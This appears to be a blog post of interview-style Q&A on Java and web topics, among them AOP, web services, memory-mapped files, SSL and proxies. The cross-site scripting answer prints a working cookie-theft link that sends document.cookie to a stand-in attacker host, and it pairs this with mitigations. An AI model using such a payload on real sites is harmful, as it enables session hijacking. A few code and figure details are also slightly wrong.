Technical: Mix topics - AOP, Ajax, WebServices, Memory mapping, SSL, Proxies

Q1. What is AOP i.e. aspect oriented programming and what is the need for same?

Ans. AOP is a new technology for separating crosscutting concerns into single units called aspects. It encapsulates behaviours that affect multiple classes into reusable modules. It entails breaking down program logic into distinct parts known as crosscutting concerns that are usually hard to do in object-oriented programming. These units/concerns are termed aspects; hence the name aspect oriented programming.

For ex: Logging. It crosscuts all logged classes and methods. Suppose we do logging at both the beginning and the end of each function body. This will result in crosscutting all classes that have at least one function. Other typical crosscutting concerns include context-sensitive error handling, performance optimization, and design patterns.

With AOP, we start by implementing our project using our OO language (for example, Java), and then we deal separately with crosscutting concerns in our code by implementing aspects. Finally, both the code and aspects are combined into a final executable form using an aspect weaver.

Above figure explains the weaving process. You should note that the original code doesn't need to know about any functionality the aspect has added; it needs only to be recompiled without the aspect to regain the original functionality. In that way, AOP complements object-oriented programming and doesn't replace it.

Q2. What are the differences between OOP and AOP?
Ans:

OOP	AOP
OOP looks at an application as a set of collaborating objects. OOP code scatters system level code like logging, security etc with the business logic code.	AOP looks at the complex software system as combined implementation of multiple concerns like business logic, data persistence, logging, security, and so on. Separates business logic code from the system level code. In fact one concern remains unaware of other concerns.
OOP nomenclature has classes, objects, interfaces etc.	AOP nomenclature has join points, point cuts, advice, and aspects.
Provides benefits such as code reuse, flexibility, improved maintainability, modular architecture, reduced development time etc with the help of polymorphism, inheritance and encapsulation.	AOP implementation coexists with the OOP by choosing OOP as the base language. Ex: AspectJ uses Java as the base language. AOP provides benefits provided by OOP plus some additional benefits.

Q3. How many different types of JDBC drivers are present? Discuss them.
Ans. There are four JDBC driver types.

Type 1: JDBC-ODBC Bridge plus ODBC Driver: The first type of JDBC driver is the JDBC-ODBC Bridge. It is a driver that provides JDBC access to databases through ODBC drivers. The ODBC driver must be configured on the client for the bridge to work. This driver type is commonly used for prototyping or when there is no JDBC driver available for a particular DBMS.

Type 2: Native-API partly-Java Driver: The Native to API driver converts JDBC commands to DBMS-specific native calls. This is much like the restriction of Type 1 drivers. The client must have some binary code loaded on its machine. These drivers do have an advantage over Type 1 drivers because they interface directly with the database.

Type 3: JDBC-Net Pure Java Driver: The JDBC-Net drivers are a three-tier solution. This type of driver translates JDBC calls into a database-independent network protocol that is sent to a middleware server. This server then translates this DBMS-independent protocol into a DBMS-specific protocol, which is sent to a particular database. The results are then routed back through the middleware server and sent back to the client. This type of solution makes it possible to implement a pure Java client. It also makes it possible to swap databases without affecting the client.

Type 4: Native-Protocol Pure Java Driver: These are pure Java drivers that communicate directly with the vendor’s database. They do this by converting JDBC commands directly into the database engine’s native protocol. This driver has no additional translation or middleware layer, which improves performance tremendously.

Q4. What is Ajax.
Ans: There is a lot of hype surrounding the latest Web development Ajax (Asynchronous JavaScript And XML). The intent of Ajax is to make Web pages more responsive and interactive by exchanging small amounts of data with the server behind the scenes without refreshing the page, so that the entire Web page does not have to be reloaded each time the user makes a change. Ajax technique uses a combination of JavaScript, XHTML (or HTML) and XMLHttp.

Q5. Web services
Ans. Web service is an implementation technology and one of the ways to implement SOA (Service Oriented Architecture). You can build SOA based applications without using Web services – for example by using other traditional technologies like Java RMI, EJB, JMS based messaging, etc. But what Web services offer is the standards based and platform independent service via HTTP, XML, SOAP, WSDL and UDDI, thus allowing interoperability between heterogeneous technologies such as J2EE and .NET.

Web services are language and platform independent. Web service uses language neutral protocols such as HTTP and communicates between disparate applications by passing XML messages to each other via a Web API (Messages must be in XML and binary data attachments). Interfaces must be based on Internet protocols such as HTTP, FTP and SMTP. There are two main styles of Web services: SOAP and REST.

A service is an application that exposes its functionality through an API (Application Programming Interface). A service is a component that can be used remotely through a remote interface either synchronously or asynchronously. The term service also implies something special about the application design, which is called a service-oriented architecture (SOA). One of the most important features of SOA is the separation of interface from implementation. A service exposes its functionality through interface and interface hides the inner workings of the implementation.

For ex: Google also provides a Web service interface through the Google API to query their search engine from an application rather than a browser.

Q6. SOAP
Ans: SOAP stands for Simple Object Access Protocol. It is an XML based lightweight protocol, which allows software components and application components to communicate, mostly using HTTP (can use SMTP etc). SOAP sits on top of the HTTP protocol. SOAP is nothing but XML message based document with pre-defined format. SOAP is designed to communicate via the Internet in a platform and language neutral manner and allows you to get around firewalls as well. Let’s look at thr structure of a SOAP message:

A SOAP message MUST be encoded using XML
A SOAP message MUST use the SOAP Envelope namespace
A SOAP message MUST use the SOAP Encoding namespace
A SOAP message must NOT contain a DTD reference
A SOAP message must NOT contain XML Processing Instructions

Q7. WSDL
Ans: WSDL stands for Web Services Description Language. A WSDL document is an XML document that describes how the messages are exchanged. Let’s say we have created a Web service. Who is going to use that and how does the client know which method to invoke and what parameters to pass? There are tools that can generate WSDL from the Web service. Also there are tools that can read a WSDL document and create the necessary code to invoke the Web service. So the WSDL is the Interface Definition Language (IDL) for Web services.

Q8. UDDI
Ans: UDDI stands for Universal Description Discovery and Integration. UDDI provides a way to publish and discover information about Web services. UDDI is like a registry rather than a repository. A registry contains only reference information like JNDI etc.

So far we have looked at some open standards/protocols relating to Web services, which enable interoperability between disparate systems (e.g. Between .Net and J2EE etc). These standards provide a common and interoperable approach for defining (WSDL), publishing (UDDI) and using (SOAP) Web services.

Q9. SAX Vs DOM Parser
Ans. Main differences between SAX (Simple API for XML) and DOM (Document Object Model), which are the two most popular APIs for processing XML documents in Java, are:-

Read v/s Read/Write: SAX can be used only for reading XML documents and not for the manipulation of the underlying XML data whereas DOM can be used for both read and write of the data in an XML document.
Sequential Access v/s Random Access: SAX can be used only for a sequential processing of an XML document whereas DOM can be used for a random processing of XML docs. So what to do if you want a random access to the underlying XML data while using SAX? You got to store and manage that information so that you can retrieve it when you need.
Call back v/s Tree: SAX uses call back mechanism and uses event-streams to read chunks of XML data into the memory in a sequential manner. A SAX parser does not create any internal structure. Instead, it takes the occurrences of components of an input document as events (i.e., event driven), and tells the client what it reads as it reads through the input document, whereas a DOM parser creates a tree structure in memory from an input document and then waits for requests from client and facilitates random access/manipulation of the underlying XML data.
API: From functionality point of view, SAX provides a fewer functions which means that the users themselves have to take care of more, such as creating their own data structures. A DOM parser is rich in functionality. It creates a DOM tree in memory and allows you to access any part of the document repeatedly and allows you to modify the DOM tree.
XML-Dev mailing list v/s W3C: SAX was developed by the XML-Dev mailing list whereas DOM was developed by W3C (World Wide Web Consortium).
Information Set: SAX doesn't retain all the info of the underlying XML document such as comments whereas DOM retains almost all the info. New versions of SAX are trying to extend their coverage of information.

Usual Misconceptions

SAX is always faster: this is a very common misunderstanding and one should be aware that SAX may not always be faster because it might not enjoy the storage-size advantage in every case due to the cost of call backs depending upon the particular situation, SAX is being used in.

DOM always keeps the whole XML doc in memory: it's not always true. DOM implementations not only vary in their code size and performance, but also in their memory requirements and few of them don't keep the entire XML doc in memory all the time. Otherwise, processing/manipulation of very large XML docs may virtually become impossible using DOM, which is of course not the case.

Q10. How to choose one between SAX & DOM?
Ans. It primarily depends upon the requirement. If the underlying XML data requires manipulation then almost always DOM will be used as SAX doesn't allow that. Similarly if the nature of access is random (for example, if you need contextual info at every stage) then DOM will be the way to go in most of the cases. But, if the XML document is only required to be read and that too sequentially, then SAX will probably be a better alternative in most of the cases. SAX was developed mainly for pasring XML documents and it's certainly good at it. Use DOM when your application has to access various parts of the document and using your own structure is just as complicated as the DOM tree. If your application has to change the tree very frequently and data has to be stored for a significant amount of time.

Q11. What is a socket? How do you facilitate inter process communication in Java?
Ans: A socket is a communication channel, which facilitates inter-process communication (ex: communicating between two JVMs). A socket is an endpoint for communication. There are two kinds of sockets, depending on whether one wishes to use a connectionless or a connection-oriented protocol.
1. The connectionless communication protocol of the Internet is called UDP
2. The connection-oriented communication protocol of the Internet is called TCP.

UDP sockets are also called datagram sockets. Each socket is uniquely identified on the entire Internet with two numbers. First number is a 32-bit (IPV4 or 128-bit is IPV6) integer called the IP address is the location of the machine, which you are trying to connect to. Second number is a 16-bit integer called the port of the socket, port on which the server you are trying to connect is running. The port numbers 0 to 1023 are reserved for standard services such as e-mail, FTP, HTTP etc.

Q12. Memory map file.
Ans. Memory-mapping a file uses the OS virtual memory to access the data on the file system directly, instead of using normal I/O functions. Most modern OS that support virtual memory also run each process in its own dedicated address space, allowing a program to be designed as though it has sole access to the virtual memory. Use mmap to make a connection between your address space and the file on the disk. Memory mapped files are loaded into memory one entire page at a time. The page size is selected by the operating system for maximum performance.While memory mapped files offer a way to read and write directly to a file at specific locations, the actual action of reading/writing to the disk is handled at a lower level. Consequently, data is not actually transferred at the time the above instructions are executed. Instead, much of the file input/output (I/O) is cached to improve general system performance. You can override this behavior and force the system to perform disk transactions immediately by using the memory-mapped file function FlushViewOfFile.

Note: jmap prints shared object memory maps or heap memory details of a given process or core file or a remote debug server.

Benefits:

Increased I/O Performance: Especially when used on large files. For small files, memory-mapped files can result in a waste of slack space as memory maps are always aligned to the page size, which is mostly 4 KB. Therefore a 5 KB file will allocate 8 KB and thus 3 KB are wasted. Accessing memory mapped files is faster for two reasons. Firstly, it does not involve a separate system call for each access. Secondly, in most OS the memory region mapped actually is the kernel's page cache (file cache), meaning that no copies need to be created in user space. It does not require copying data between buffers – the memory is accessed directly.
Faster read/write operations: Applications can access and update data in the file directly and in-place, as opposed to seeking from the start of the file or rewriting the entire edited contents to a temporary location. Since the memory-mapped file is handled internally in pages, linear file access requires disk access only when a new page boundary is crossed, and can write larger sections of the file to disk in a single operation.
Lazy Loading: It uses small amounts of RAM even for a very large file. Trying to load the entire contents of a file that is significantly larger than the amount of memory available can cause severe thrashing.

Drawbacks:

The memory mapped approach has its cost in minor page faults - when a block of data is loaded in page cache, but is not yet mapped into the process's virtual memory space. In some circumstances, memory mapped file I/O can be substantially slower than standard file I/O.
Another drawback relates to a given architecture's address space - a file larger than the addressable space can have only portions mapped at a time, complicating reading it. For ex: a 32-bit architecture such as Intel's IA-32 can only directly address 4 GB or smaller portions of files.

Common uses

Most common use is the process loader in most modern OS (including Windows & Unix). When a process is started, OS uses a memory mapped file to bring the executable file, along with any loadable modules, into memory for execution.
Another common use is to share memory between multiple processes. In modern OS, processes are generally not permitted to access memory space that is allocated for use by another process. There are a number of techniques available to safely share memory, and memory-mapped file I/O is one of the most popular. Two or more applications can simultaneously map a single physical file into memory and access this memory.

Platform support

Most modern OS or runtime environments support some form of memory mapped file access. The function mmap(), which creates a mapping of a file given a file descriptor, starting location in the file, and a length, is part of the POSIX specification. So, POSIX-compliant systems, such as Unix, Linux, Mac OS etc. support a common mechanism for memory mapping files. The mmap() function establishes a mapping between a process' address space and a stream file.
The Microsoft Windows operating systems also support a group of API functions for this purpose, such as CreateFileMapping(). Java provides classes and methods to access memory mapped files, such as FileChannel.

Q13. MemoryMapFile Usage example.
Ans. We used the FileChannel class along with the ByteBuffer class to perform memory-mapped IO for data of type byte. These byte is then retrieved by using get() method of ByteBuffer class.
FileChannel: An abstract class used for reading, writing, mapping, and manipulating a file.
ByteBuffer: An abstract class which provides methods for reading and writing values of all primitive types except Boolean.
map() method: This method maps the region of the channel's file directly into memory.
size() method: This method returns the current size of this channel's file.

Usage Modes:
FileChannel.MapMode.PRIVATE: Mode for a private (copy-on-write) mapping.
FileChannel.MapMode.READ_ONLY: Mode for a read-only mapping.
FileChannel.MapMode.READ_WRITE: Mode for a read/write mapping.

Usage example:
File file = new File("filename");

// Create a read-only memory-mapped file
FileChannel roChannel = new RandomAccessFile(file, "r").getChannel();
ByteBuffer roBuf = roChannel.map(FileChannel.MapMode.READ_ONLY, 0, (int)roChannel.size());

// Create a read-write memory-mapped file
FileChannel rwChannel = new RandomAccessFile(file, "rw").getChannel();
ByteBuffer wrBuf = rwChannel.map(FileChannel.MapMode.READ_WRITE,0,(int)rwChannel.size());

// Create a private (copy-on-write) memory-mapped file.
// Any write to this channel results in a private copy of the data.
FileChannel pvChannel = new RandomAccessFile(file, "rw").getChannel();
ByteBuffer pvBuf = roChannel.map(FileChannel.MapMode.READ_WRITE,0,(int)rwChannel.size());
Although the return value from map() is assigned to a ByteBuffer variable, it's actually a MappedByteBuffer. Most of the time there's no reason to differentiate, but the latter class has two methods that some programs may find useful - load() and force().
The load() method will attempt to load all of the file's data into RAM, trading an increase in startup time for a potential decrease in page faults later. This is a form of premature optimization. Unless your program constantly accesses those pages, OS may choose to use them for something else, meaning that you'll have to fault them in. To flush dirty pages to disk, call the buffer's force() method.

buf.putInt(0, 0x87654321);
buf.force();Above two lines of code are actually an anti-pattern: you don't want to flush dirty pages after every write. Take a lesson from database developers, and group your changes into atomic units.

Q14. Mapping Files Bigger than 2 GB
Ans. Depending on your filesystem, you can create files larger than 2GB. But ByteBuffer uses an int for all indexes, which means that buffers are limited to 2GB, which means that you need to create multiple buffers to work with large files.

Sol1: Create those buffers as needed. The same underlying FileChannel can support as many buffers as you can create, limited only by the OS and available virtual memory; simply pass a different starting offset each time. The problem with this approach is that creating a mapping is expensive, because it's a kernel call (and you're using mapped files to avoid kernel calls). In addition, a page table full of mappings will mean more expensive context switches. As a result, as-needed buffers aren't a good approach unless you can divide the file into large chunks that are processed as a unit.

Sol2: Create a “super buffer” that maps the entire file and presents an API that uses long offsets. Internally, it maintains an array of mappings with a known size, so that you can easily translate the original index into a buffer and an offset within that buffer:
public int getInt(long index) {
return buffer(index).getInt();
}

private ByteBuffer buffer(long index) {
  ByteBuffer buf = _buffers[(int)(index / _segmentSize)];
  buf.position((int)(index % _segmentSize));
  return buf;
}

What's a good value for _segmentSize? Your first thought might be Integer.MAX_VALUE, since this is the maximum index value for a buffer. While that would result in the fewest number of buffers to cover the file, it has one big flaw - you won't be able to access multi-byte values at segment boundaries. Instead, you should overlap buffers, with the size of the overlap being the maximum sub-buffer that you need to access.

NOTE: Buffer will persist after the channel is closed, it's removed by the garbage collector (and this explains the reason that MappedByteBuffer doesn't have its own close() method).

Q15. Garbage Collection of Direct/Mapped Buffers
Ans. How does the non-heap i.e. virtual memory for direct buffers and mapped files get released? After all, there's no method to explicitly close or release them. The answer is that they get garbage collected like any other object, but with one twist: if you don't have enough virtual memory space, that will trigger a full collection even if there's plenty of heap memory available. Normally, this won't be an issue: you probably won't be allocating and releasing direct buffers more often than heap-resident objects. If, however, you see full GC's appearing when you don't think they should, take a look at your program's use of buffers.

Q16. How does HTTPS/SSL work.
Ans.

SSL Overview from the Customer's Browser viewpoint
1. Browser checks the certificate to make sure that the site you are connecting to is the real site and not someone intercepting.

2. Determine encryption types that the browser and web site server can both use to understand each other.
3. Browser and Server send each other unique codes to use when scrambling (or encrypting) the information that will be sent.
4. The browser and Server start talking using the encryption, the web browser shows the encrypting icon, and web pages are processed secured.

SSL in Action
Let’s see how SSL actually works for securing your communications over the Internet. Before the communications occur, the following takes place:

1. A company wishes to secure communications to their server www.company.com and go to trusted third party (ex: Verisign) to get a new public key that has some additional information in it. This certification information is encrypted using private key.

2. Now, client makes a connection to www.company.com with its computer on a special “port” (address) that is set up for SSL communications only.

3. When Client connects to www.company.com on its SSL-secured port, the company sends back its public key. Client gets the public key and decides if it is OK. If the client doesn’t trust the server, then the communication is terminated.

4. If the client has its own SSL certificate installed, it may send that to the server at this point to see if the server trusts the client. Client-side SSL certificates are not commonly used, but provide a good way for the client to authenticate itself with the server without using a username or password. In the case where this is used, the server would have to know about the client’s certificate and verify it in a similar way to how the client verified the server. If this fails, the connection is terminated. If a client-side certificate is not needed, this step is skipped.

5. Once the client is happy with the server (and the server with the client, if needed), then the client choose an SSL Cipher to use from the list of encryption methods provided by the server, and generates a “symmetric key” (password) for use with that Cipher. The client encrypts this password using the server’s public key and sends it back to the server. Only the server can de-crypt this message and get this password, which is now shared by both the client and server.

6. The client will then start communicating with the company by encrypting all data using this password and the chosen Cipher. These keys were needed to enable the company (and possibly the client) to prove its identity and right to domain.com and to enable the client and server to generate and securely communicate a common password.

Q17. Are there limitations to This Process?
Ans.

1. Key Length
2. Trust on third party issuing keys
3. Ciphers

Q18. What Services Can be Protected With SSL?
Ans. Almost any Internet service can be protected with SSL. Common ones include WebMail, POP, IMAP, and SMTP and other secure web sites such as banking sites and corporate sites. LuxSci provides SSL services to protect your username, password, and communications over all of these and other services.

Web servers and Web browsers rely on the SSL protocol to create a uniquely encrypted channel for private communications over the public Internet. Each SSL Certificate consists of a public key and a private key. The public key is used to encrypt information and the private key is used to decipher it. When a Web browser points to a secured domain, a level of encryption is established based on the type of SSL Certificate as well as the client Web browser, operating system and host server’s capabilities. That is why SSL Certificates feature a range of encryption levels such as "up to 256-bit".

Strong encryption, at 128 bits, can calculate 288 times as many combinations as 40-bit encryption.

Q19. Cross-site scripting – cookie theft

Ans. Cross-site scripting: A cookie that should be only exchanged between a server and a client is sent to another party.

Scripting languages such as JavaScript are usually allowed to access cookie values and have some means to send arbitrary values to arbitrary servers on the Internet. These facts are used in combination with sites allowing users to post HTML content that other users can see.

As an example, an attacker may post a message on www.example.com with the following link:

<a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;"> Click here! </a>

When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string "document.cookie" with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the attacker.com server. If the attacker’s posting is on https://www.example.com/somewhere, secure cookies will also be sent to attacker.com in plain text. In the meantime, such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client side script, and therefore the attacker will not be able to gather these cookies.However, if an attacker is able to insert a piece of script to a page on www.example.com, and a victim’s browser executes the script, the script can simply carry out the attack. This attack would use victim’s browser to send HTTP requests to servers directly. Therefore, the victim’s browser would submit all relevant cookies, including HttpOnly cookies, as well as Secure cookies if the script request is on HTTPS.

For example, on MySpace, Samy posted a short message “Samy is my hero” on his profile, with a hidden script to send Samy a “friend request” and then post the same message on the victim’s profile. A user reading Samy’s profile would send Samy a “friend request” and post the same message on this person’s profile. Then, the third person reading the second person’s profile would do the same. Pretty soon, this "Samy worm" became one of the fastest spreading viruses of all time. This type of attack (with automated scripts) would not work if a website has CAPTCHA to challenge client requests.

Q20. How to determine proxies
Ans.
At client end
· Client software (e.g. Java applets or Flash apps) might be able to read browser settings, or directly connect to a web service on the target system (bypassing the proxy) to verify that the IPs match.
· Another common practice is to have the browser view the site with and without HTTPS, and see if the connections come from the same IP. Many transparent (e.g. caching) proxies will allow SSL traffic to pass by without proxying, since proxying an SSL connection requires spoofing certificates, and this causes a whole bucket of other problems. In this case, the SSL address is the "real" one, and the non-SSL address is the address of the proxy

At target end
· Proxy headers, such as X-Forwarded-For and X-Client-IP, can be added by non-transparent proxies.
· Active proxy checking can be used - target server attempts to connect to the client IP on common proxy ports (e.g. 8080) and flags it as a proxy if it finds such a service running.
· Servers can check if the request is coming from an IP that is a known proxy. WhatsMyIP probably has a big list of these, including common ones like HideMyAss.

Q21. What is a Proxy Server?

Ans. A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache.

Web proxies

This provides a nearby cache of Web pages and files available on remote Web servers, allowing local network clients to access them more quickly or reliably. When it receives a request for a Web resource, a caching proxy looks for the resulting URL in its local cache. If found, it returns the document immediately. Otherwise it fetches it from the remote server, returns it to the requester and saves a copy in the cache. The cache usually uses an expiry algorithm to remove documents from the cache, according to their age, size, and access history. Two simple cache algorithms are Least Recently Used (LRU) and Least Frequently Used (LFU).

Web proxies can also filter the content of Web pages served. Some censor aware applications - which attempt to block offensive Web content - are implemented as Web proxies. Other web proxies reformat web pages for a specific purpose or audience; for example, Skweezer re-formats web pages for cell phones and PDAs. Network operators can also deploy proxies to intercept computer viruses and other hostile content served from remote Web pages.

A special case of web proxies are "CGI proxies." These are web sites which allow a user to access a site through them. They generally use PHP or CGI to implement the proxying functionality. CGI proxies are frequently used to gain access to web sites blocked by corporate or school proxies. Since they also hide the user's own IP address from the web sites they access through the proxy, they are sometimes also used to gain a degree of anonymity.

You may see references to four different types of proxy servers:

Transparent Proxy: This type of proxy server identifies itself as a proxy server and makes the original IP address available through the HTTP headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it

Anonymous Proxy: This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.

Distorting Proxy: This type of proxy server identifies itself as a proxy server and makes an incorrect original IP address available through the http headers.

High Anonymity Proxy: This type of proxy server does *NOT* identify itself as a proxy server and does not make available the original IP address

Q22. Anti-bot techniques

Ans. First of all, how do we separate them as good or bad

Good ones
Intentionally good and result is efficient: Like google and yahoo. They scan your website and return visitors via search queries in exchange. They leech away your resources but give something in return. They usually identify themselves as some robot or spider and obey the robots.txt rules. Sometimes they do not.

Intentionally good but result is inefficient: Like cuil or yandex or other wanna look good but index selling companies. Leeching your resources and nothing in return. This is the place where you want to decide, if a bot leeches away 5% of your bandwith and return 5 visitors in a month or none. You should list that one as bad also.

Bad ones
Ones that scans your website and links in order to harvest emails, content, links and weak security measures and sell them to other people, businesses and other sources. Leeching from your back in other words. They are all bad and should not be allowed to view your contents. They usually identify themselves as normal web users and do not care about robots.txt

Catching bots

There is no sure-fire way to catch all bots. A bot could act just like a real browser if someone wanted that. Most serious bots identify themselves clearly in the agent string, so with a list of known bots you can filter out most of them. To the list, you can also add some agent strings that some HTTP libraries use by default, to catch bots from people who don't even know how to change the agent string. If you just log the agent strings of visitors, you should be able to pick out the ones to store in the list.

You can also make a "bad bot trap" by putting a hidden link on your page that leads to a page that's filtered out in your robots.txt file. Serious bots would not follow the link, and humans can't click on it, so only bot that doesn't follow the rules request the file.

You could do several things to detect bots including:

1) Putting a fake field that only bots will see. Then, if that field is submitted with the rest of the form, you know it is a bat. You can choose to ignore it or ban them if desired. You can also trap bad bots who follow a hidden link. This technique is known as honey pot.

2) Use a CAPATCHA like reCAPTCHA

3) Use a field that requires the user to answer a question like what is 5 + 3. Any human can answer it but a bot won't know what to do since it is auto-populating fields based on field names. So that field will be either incorrect or missing in which case the submission will be rejected.

4) Use a token and put it into a session and also add it to the form. If the token is not submitted with the form or doesn't match then it is automated and can be ignored.

5) Look for repeated submissions from the same IP address. If your form shouldn't get too many requests but suddenly is, it probably is being hit by a bot and you should consider temporarily blocking the IP address.

The point isn't to create a bot-proof site, but just to create enough of a deterrent that bot users will simply choose other easier targets. So what is required here will vary from site to site.

Refer http://www.elxsy.com/2009/06/how-to-identify-and-ban-bots-spiders-crawlers/ for more details

Technical

Translate

Tuesday, August 27, 2013

Mix topics - AOP, Ajax, WebServices, Memory mapping, SSL, Proxies

No comments:

Post a Comment

Total Pageviews